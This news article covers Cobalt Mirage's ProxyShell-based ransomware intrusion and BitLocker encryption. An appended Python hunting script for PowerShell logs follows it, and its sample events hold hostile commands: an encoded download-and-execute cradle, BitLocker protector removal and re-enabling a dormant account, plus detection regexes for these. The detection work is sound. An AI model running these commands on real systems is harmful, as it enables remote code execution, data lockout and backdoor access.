PowerShell used by Iran’s Cobalt Mirage in June ransomware attack


Secureworks researchers reporting on Wednesday on a June ransomware incident found that Iran’s Cobalt Mirage group, which is linked to the Islamic Revolutionary Guard Corps (IRGC), had exploited the ProxyShell vulnerabilities in Microsoft Exchange Server (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207), highlighting the need for security teams to better detect malicious PowerShell activity.

In a blog post, the Secureworks researchers said it’s likely the compromise was opportunistic rather than targeted at a particular organization or group. The researchers said that, consistent with their established intrusion pattern, Cobalt Mirage deployed multiple web shells and TunnelFish, a custom variant of the Fast Reverse Proxy Client (FRPC).

Once the web shells and FRPC were in place, the threat actors enabled the built-in Windows default account, set its password to one researchers believe Cobalt Mirage reuses across intrusions ([email protected]), and encrypted multiple servers using BitLocker.

The TTPs used in the attack are mostly commonplace across the board, and the attack was, as the blog puts it, “almost certainly opportunistic,” said Geoff Fisher, senior director, integration strategy at Tanium. Fisher said the investigation by Secureworks is quite good and very thorough in tracing the Iranian threat group’s activity on a number of fronts.

“Like the FSB, the IRGC uses contractors to research IP and allow them to make money from ransomware,” Fisher said. “The playbook here is tried, true, and profitable for groups. But like many eCrime groups, they can get sloppy in the craft, which is why it was so easy to trace back to the IRGC. From the point of view of day-to-day security operations, this poses no more undue risk than normal. Operators should note the information presented for C2 here and fix their systems, as the two vulnerabilities listed are very well known, old, and exploited, per CISA guidelines.”

Threat groups continue to abuse legitimate tools, such as PowerShell, said Nicole Hoffman, senior cyber threat intelligence analyst at Digital Shadows. Hoffman said the industry is past the proof-of-concept stage for malicious abuse of PowerShell.

“Regardless of attacker sophistication, PowerShell remains a widespread problem,” Hoffman said. “Organizations need to ensure they have visibility to detect malicious PowerShell activity. Additionally, there seems to be a greater tendency for threat actors to misuse BitLocker for encryption capabilities.”
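The visibility Hoffman describes starts with PowerShell script block logging and a way to triage what it produces. The following Python script is an added example, not code from the article, from Secureworks or from either analyst quoted; it scores exported script-block events for the behaviours the incident involved (encoded commands, download cradles, hidden/bypass launch flags, BitLocker manipulation and re-enabling a dormant local account). It assumes script block logging is enabled (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) and that events were exported as one JSON object per line with TimeCreated, Computer and ScriptBlockText keys; that export layout, the rule names, the hosts and the sample events themselves are all constructed for this example.

```python
"""Triage exported PowerShell script-block events for the behaviours seen in
the Cobalt Mirage incident: encoded commands, download cradles, hidden/bypass
flags, BitLocker manipulation and re-enabling a dormant local account.

Added example, not code from the article or from Secureworks. Assumptions:
script block logging is on (Event ID 4104, Microsoft-Windows-PowerShell/
Operational) and events were exported as one JSON object per line with
TimeCreated, Computer and ScriptBlockText keys (a layout chosen for this
example). Records carrying a CommandLine key instead (Security 4688 or
Sysmon Event ID 1 exports) are scored the same way.
"""
import base64
import json
import re

# A download cradle, base64(UTF-16LE) encoded the way -EncodedCommand expects.
# Built here so the constructed sample below contains a real, decodable blob.
CRADLE_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
CRADLE_ENCODED = base64.b64encode(CRADLE_PLAINTEXT.encode("utf-16-le")).decode("ascii")

# Constructed sample events (not real telemetry): two benign, two malicious.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"TimeCreated": "2022-06-14T02:11:09Z", "Computer": "EXCH01",
     "ScriptBlockText": "Get-Service | Where-Object Status -eq 'Running'"},
    {"TimeCreated": "2022-06-14T02:13:41Z", "Computer": "EXCH01",
     "ScriptBlockText": "Start-Process powershell.exe -ArgumentList "
                        f"'-NoProfile -WindowStyle Hidden -EncodedCommand {CRADLE_ENCODED}'"},
    {"TimeCreated": "2022-06-14T02:20:05Z", "Computer": "FS02",
     "ScriptBlockText": "net user DefaultAccount /active:yes; "
                        "manage-bde -on C: -RecoveryPassword; manage-bde -protectors -delete C: -type TPM"},
    {"TimeCreated": "2022-06-14T02:25:00Z", "Computer": "FS02",
     "ScriptBlockText": "Get-ChildItem C:\\Logs | Measure-Object"},
])

# Heuristic rules; each is a triage signal, not proof of compromise.
RULES = {
    "encoded_command": re.compile(r"-e(?:c|nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer", re.I),
    "invoke_expression": re.compile(r"Invoke-Expression|\biex\b", re.I),
    "hidden_or_bypass": re.compile(r"-WindowStyle\s+Hidden|-ExecutionPolicy\s+Bypass|-NoProfile", re.I),
    "bitlocker_abuse": re.compile(
        r"manage-bde|Enable-BitLocker|Add-BitLockerKeyProtector|Remove-BitLockerKeyProtector", re.I),
    "account_enable": re.compile(r"net\s+user\s+\S+\s+/active:yes|Enable-LocalUser", re.I),
}


def decode_encoded_commands(text):
    """Return the plaintext of every -EncodedCommand blob in text.
    PowerShell expects base64 over UTF-16LE; malformed blobs are skipped."""
    decoded = []
    for m in RULES["encoded_command"].finditer(text):
        blob = m.group(0).split()[-1]
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def analyze_script_block(text):
    """Score one script block or command line. Encoded payloads are decoded and
    scored as plaintext too, so a cradle hidden behind -EncodedCommand still
    fires the download/iex rules. Returns the set of rule names that matched."""
    hits = set()
    for view in [text, *decode_encoded_commands(text)]:
        for name, rx in RULES.items():
            if rx.search(view):
                hits.add(name)
    return hits


def hunt(jsonl):
    """Parse exported events (one JSON object per line) and return a finding
    for each suspicious one: time, host, sorted rule names, decoded payloads."""
    findings = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        text = ev.get("ScriptBlockText") or ev.get("CommandLine") or ""
        hits = analyze_script_block(text)
        if hits:
            findings.append({
                "time": ev.get("TimeCreated"),
                "host": ev.get("Computer"),
                "rules": sorted(hits),
                "decoded": decode_encoded_commands(text),
            })
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['time']} {f['host']} {', '.join(f['rules'])}")
        for payload in f["decoded"]:
            print(f"    decoded: {payload}")
```

Run as-is it reports the two malicious sample events; for real data, read an export file and pass its contents to hunt(). Script block logging is switched on through Group Policy (Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell > Turn on PowerShell Script Block Logging) or by setting EnableScriptBlockLogging to 1 under HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging. Two caveats worth keeping in mind: 4104 records a script block after PowerShell has decoded it, so a command launched directly as powershell.exe -EncodedCommand shows up in that log in plaintext and the encoded form lives in process-creation telemetry (Security 4688 with command-line auditing, or Sysmon Event ID 1), which is why the script also accepts a CommandLine field; and -NoProfile or -ExecutionPolicy Bypass are routine in legitimate automation, so hidden_or_bypass should add weight to the other rules rather than alert on its own.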

